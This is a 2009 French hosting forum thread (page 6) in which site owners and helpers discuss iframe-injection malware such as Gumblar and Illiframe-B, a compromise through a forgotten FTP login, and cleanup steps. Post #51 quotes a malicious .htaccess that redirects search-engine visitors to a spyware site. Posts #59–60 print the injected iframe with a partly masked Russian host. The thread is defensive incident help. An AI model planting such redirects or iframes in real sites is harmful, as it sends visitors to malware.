Page 6 sur 11 PremièrePremière ... 45678 ... DernièreDernière
Affichage des résultats 51 à 60 sur 110

Discussion: ATTAQUES SITES WEB PAR IFRAMES : PROBLEMES ET SOLUTIONS (Gumblar, Martuz, etc.)

  1. #51
    Membre
    Date d'inscription
    August 2009
    Messages
    5

    Re : ATTAQUES SITES WEB PAR IFRAMES : PROBLEMES ET SOLUTIONS (Gumblar, Martuz, etc.)

    Bonjour à tous,
    me voici avec des retours très concrets

    Hier j'ai absolument tout vider sur mon espace web, tout table ras

    après j'ai fait un scan complet de mes deux PC (il y en a un seul qui utilise ftp pour se connecter à mon site)

    En fait en mode sans echec j'ai passé CCleaner, RegCleaner, Malwarebytes.

    Sur mon poste j'ai constamment Avast qui laboure, ad-aware et j'ai aussi installé ZoneAlarm qui normalent est là pour m'indiquer tout accès sur internet.

    tous ces logiciels ont indiqué que mon poste est propre.

    Acrobat et Flash Player ont été desintallé et re-installé la semaine dernière.

    Hier soir avant d'eitteindre mon poste j'ai créé un nouvau mot de passe ftp de sorte de rallumer mon poste le lendemain avec un noveau mot de passe.

    J'allume ce matin et une demie heure plus tard je me connecte sur ftp pour placer une petite page .html où il n'y a qu'un message indiquant que mon site, ayant été mechament hacké, il est en reconstrucion.

    et voilà que je trouve un joli .htaccess créé par un propriétaire que je ne connait pas (2338 100) et dans lequel je lis:

    Code:
    RewriteEngine On
    
    RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
    
    RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
    
    RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
    
    RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
    
    RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
    
    
    RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
    
    
    RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
    
    RewriteRule .* http://spywareshop.info/0/go.php?sid=2 [R,L]
    Quelqu'un peut me dire comment un trojan quel qu'il soit peut chopper mon nouveau mot de passe alors que je ne l'avais pas encore saisi (je vous rappelle j'en avais créé un tout neuf la veille au soir) et aussi me dire ce que ce .httaccess veut dire?

    merci de votre aide et là j'avoue ne pas comprendre du tout car je ne saisit mon nouveau de passe à 11:7 alors que ces fichiers datent de 10:32 donc l'heure à laquelle j'ai allumé mon poste.

    Sauf si ce fichier .htaccess c'est ovh qui le crée... ou google....

    je n'en peux plus.

    merci à tous

  2. #52
    Membre
    Date d'inscription
    January 2007
    Messages
    111

    Re : ATTAQUES SITES WEB PAR IFRAMES : PROBLEMES ET SOLUTIONS (Gumblar, Martuz, etc.)

    Quel est le chmod du répertoire où est ce htaccess ? y a des choses au niveau des log ftp, apache ?

  3. #53
    Membre
    Date d'inscription
    August 2009
    Messages
    5

    Re : ATTAQUES SITES WEB PAR IFRAMES : PROBLEMES ET SOLUTIONS (Gumblar, Martuz, etc.)

    Bonjour et merci

    en faite, moyennant du paiement au super support ovh (...) j'ai reussi à qu'il me disent que la connexion se faisait sur un autre login ftp (multi-ftp).

    SAUF QUE LE LOGIN QUI APPARAISSAIT je ne le connassait pas homez.43
    Je n'ai jamais créé un login comme ceci de ma vie.

    J'avais créé un espace ftp secondaire pour un ancien client (qu'il puisse prendre des fichiers que je lui livrais) mais jamais homez.43

    sauf si ceci est créé automatiquement.... je ne sais pas.

    donc je ne sais pas d'où vient cette faille; peut-être d'OVH lui-même mais ils diront toujours que non!!!!

    j'ai supprimé cette chose, fais un chown pour me redonner le propriété à mes répertoires et pour l'instant ça a l'air d'aller mieux.

    depuis 6 mois je me bats avec ovh pour qu'il me donnent plus d'info et finalement j'ai dû leur payer (c'est ce qu'ils veulent) afin d'avoir plus d'info.

    j'ai dû supprimer entièrement mon espace web; j'attends un peu avant de tout recommencer et de dire à Google de revoir mon site car je suis classé comme site "malveillant" biensûr.

    c'est fou cette histoire.

    affaire malheureusement à suivre

    D'accord j'ai regardé sur google et homez.xxx est bien lié au multi-ftp de ovh; donc c'est normal
    alors la chose est que c'est par cette porte qu'ils entraient ces chinois... puisque ce sont des chinois qui m'ont chopper cette entrée

    merci à tous en esperant que peu à peu ce merdier cera reglé pour tous
    Dernière modification par PN1114 ; 06/09/2009 à 13h10. Motif: suite de la recherche

  4. #54
    Membre
    Date d'inscription
    June 2006
    Messages
    208

    Re : ATTAQUES SITES WEB PAR IFRAMES : PROBLEMES ET SOLUTIONS (Gumblar, Martuz, etc.)

    PN1114, pourraîs-tu nous donner plus de détails STP ?

    Peut-être nous recopier la réponse du support OVH si elle était écrite ?

    Evidemment, masque les mots de passe et remplace ton nom de domaine par "mondomaine.net" ou n'importe quoi, de même pour les logins. Fais de même pour ceux du client.


    Par exemple, tu devrais avoir ce type d'informations (voir l'email que tu as reçu à ta création de compte)

    Code:
    FTP 
    Serveur ftp          : ftp.mondomaine.com  ou ftp.90Plan.ovh.net
    Login ou utilisateur : AAAAAAAAA
    Mot de passe         : huhuhuhuhiu
    
    
    FTP ANONYME, codes pour upload
     Serveur ftp  : ftp2.mondomaine.com ou anonymous.ftp.ovh.net
     Login        : AAAAAAAAA
     mot de passe : xyxyxyxyxyxyx
    Et ensuite, tu devrais avoir créé un sous-dossier FTP dans ton FTP principal (celui du site, pas l'anonyme) et y avoir attaché un login et mot de passe pour le client, de telle sorte que quand, il se connecte, il ne voit QUE son sous dossier.

    A partir de là, si tout est bien comme ça, c'est cette histoire "d'autre login" qui nous intéresse. ET comment il a pu être utilisé. (Ou alors je ne suis pas réveillé, c'est possible, grosse nuit de travail)

    homez.43 est un nom utilisé par OVH pour les chemins "en dur" de ses serveurs et il se susbtitue à "/home" qui est le chemin relatif utilisé dans les scripts.
    Attaques Sites Web par Iframes (et similaires) : Problèmes et Solutions (Gumblar, Martuz, etc.)
    http://forum.ovh.com/showthread.php?t=49433

  5. #55
    Membre
    Date d'inscription
    August 2009
    Messages
    5

    Re : ATTAQUES SITES WEB PAR IFRAMES : PROBLEMES ET SOLUTIONS (Gumblar, Martuz, etc.)

    Bonsoir

    Concernant l'autre login en fait il y a déjà plus d'un an j'avais créé un espace ftp pour un client pour qu'il puisse recupérer des fichiers.

    C'est sur cette connexion ftp que les fameux trojans ont réussit à chopper mon mot de passe.
    Moi j'avais totalement oublié que j'avais créé cela car c'est un ancien client; donc pendant des semaines je changais mon mot de passe trois fois par jours en croyant que le souci était sur mon ftp principal!!!!! Alors qu'il fallait le changer aussi sur le secondaire mais dont j'avais oublié l'existence.

    Ce que je ne pardonne pas au support OVH c'est d'avoir mis autant de temps, disons d'avoir attendu que je paie le service de support pour me donner cette information!!!!! J'en revenais pas!!!!

    Je pense que les chinois (car ce sont des chinois qui se connectaient) ont choppé mon mot de passe il y a très longtemps car ils ont fait un vrai dégas sur mon site et ils sont abusé de ma messagerie en tant que système de spam (je n'utilise pas l'adresse email de mon site me passe par hotmail donc je n'étais même pas au courant)

    donc voilà ça a été la cata, l'état de mon site auprès de Google c'est un desastre mais j'ai demandé qu'il revalue le site. On verra.

    Je ne peux pas t'en dire plus car ma conversation avec ovh a été par téléphone sur ce point et que j'ai supprimé ce deuxième ftp si vite lorsque j'ai vu que c'était là que...

    Depuis, tout se passe bien est mon site reste inviolé à ce jour donc depuis samedi (nous sommes mardi... déjà mercredi vu l'heure).

    bonne nuit à tous

  6. #56
    Membre
    Date d'inscription
    January 2007
    Messages
    319

    Re : ATTAQUES SITES WEB PAR IFRAMES : PROBLEMES ET SOLUTIONS (Gumblar, Martuz, etc.)

    >chbj
    Je tiens tout simplement à te remercie, j'ai eu pas mal de problème avec mes clients sur ce thème là, la solution pour moi, c'est analizer les FTP des clients, y si ce sont des ips etrangère, verifie le code et bloque la web en prevenant le client si le code contient cette me...
    Mais depuis pas mal de temp je cherche des explications sur ce thème là pour pouvoir leur expliquer ce qu'ils doivent faire.
    Ton post donne deja beaucoup de piste.

  7. #57
    Membre
    Date d'inscription
    October 2005
    Messages
    4

    Re : ATTAQUES SITES WEB PAR IFRAMES : PROBLEMES ET SOLUTIONS (Gumblar, Martuz, etc.)

    http://www.bruno-tran.fr/
    http://www.bruno-tran.fr/blog

    J'ai attrapé cette m**** . Toutes les pages des sites et sous-sites que j'ai s'affichent mal ou plantent...
    Le gars qui a programmé est une belle enflure
    je verrais ce que je peux faire ce soir. comme si j'avais que ça à faire quoi...

  8. #58
    Membre
    Date d'inscription
    March 2004
    Messages
    4 917

    Re : ATTAQUES SITES WEB PAR IFRAMES : PROBLEMES ET SOLUTIONS (Gumblar, Martuz, etc.)

    Avast! rapporte une infection de type HTML:Illiframe-B[Trj] sur votre site.
    Quand on voit ce qu'on voit, qu'on entend ce qu'on entend, on a bien raison de penser ce qu'on pense...
    Guides OVH - Guides OVH new - OpenClassRoom - URL Rewriting - Rédaction .htaccess - Forums

  9. #59
    Membre
    Date d'inscription
    June 2006
    Messages
    208

    Re : ATTAQUES SITES WEB PAR IFRAMES : PROBLEMES ET SOLUTIONS (Gumblar, Martuz, etc.)

    Bien vu, Daniel60

    La variété Illiframe-B est actuellement en recrudescence d'activité.

    Hier, pour ne citer qu'un seul site "très public" et "important", le site de la Fondation de Monaco pour la lutte contre le SIDA a été infecté. (Je ne donne volontairement pas l'adresse.)


    Dieu merci, ce trojan très en vogue n'utilise que la méthode de l'iframe simple.

    Si vous êtes infectés, il est à peu près certain que le code malveillant est :

    Code:
    <iframe src="http://beeeo.XXXXXXXXXXru:8080/index.php" width=619 height=145 ></iframe>
    Supprimer "XXXXXXXXXX" pour voir le code réel. "XXXXXXXXXX" est une mesure de sécurité.

    - Effacer tous ces iframes
    - Vérifier la présence d'autres i frames
    - Appliquer les règles de mon How-To pour nettoyer TOUS les PC et le site
    - Changer les codes FTP obligatoirement
    Attaques Sites Web par Iframes (et similaires) : Problèmes et Solutions (Gumblar, Martuz, etc.)
    http://forum.ovh.com/showthread.php?t=49433

  10. #60
    Membre
    Date d'inscription
    June 2006
    Messages
    208

    Re : ATTAQUES SITES WEB PAR IFRAMES : PROBLEMES ET SOLUTIONS (Gumblar, Martuz, etc.)

    Info supplémentaire au post ci-dessus.... Ca va très vite avec ce Trojan.

    Attention, comme je le suspectais, il peut y avoir PLUSIEURS iframe différents si on est infecté par lui.

    En plus de beeeo.XXXXXru, on trouve fréquemment biozovXXXXX.ru

    Enlever XXXXX pour voir l'adresse réelle.


    Il faut, une fois de plus, rappeler qu'il est indispensable de rechercher TOUS les iframes. (Voir aussi les function supects, se reporter au How-To.)
    Attaques Sites Web par Iframes (et similaires) : Problèmes et Solutions (Gumblar, Martuz, etc.)
    http://forum.ovh.com/showthread.php?t=49433

Page 6 sur 11 PremièrePremière ... 45678 ... DernièreDernière

Règles de messages

  • Vous ne pouvez pas créer de nouvelles discussions
  • Vous ne pouvez pas envoyer des réponses
  • Vous ne pouvez pas envoyer des pièces jointes
  • Vous ne pouvez pas modifier vos messages
  •